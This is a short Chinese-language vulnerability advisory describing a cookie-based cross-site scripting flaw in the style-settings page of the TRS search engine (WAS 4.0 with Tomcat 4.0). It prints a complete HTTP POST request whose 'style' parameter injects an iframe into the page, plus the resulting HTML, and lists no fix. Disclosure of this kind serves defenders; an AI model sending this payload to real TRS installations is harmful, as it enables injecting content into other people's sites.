影响版本:
WAS 4.0 + Tomcat 4.0 for Windows
漏洞描述:
TRS 搜索引擎是TRS公司推出搭建智能化、个性化和企业级搜索引擎的优选平台。
TRS 搜索引擎在“风格设置"模块存在一处缺陷,允许恶意攻击者在页面中植入任意代码。(cookies xss)
<*参考
Email:wsn1983#gmail.com
blog:http://hi.baidu.com/nansec
*>
安全建议:
暂无
测试方法:
———————————————————
POST /was40/dosetstyle.jsp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
Referer: http://site:8080/was40/setstyle.jsp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727)
Host: site_ip:8080
Content-Length: 13
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: styleCookie=default; JSESSIONID=8C2613D2A5FD270091960DF9EE76CCA3
style=default.css" type="text/css"><iframe src=http://www.baidu.com></iframe><link href="css/style_default
———————————————————-
html页面中
<link href="css/style_[color=#FF0000]default.css" type="text/css"><iframe src=http://hi.baidu.com/nansec></iframe><link href="css/style_default.[/color]css" rel="stylesheet" type="text/css">
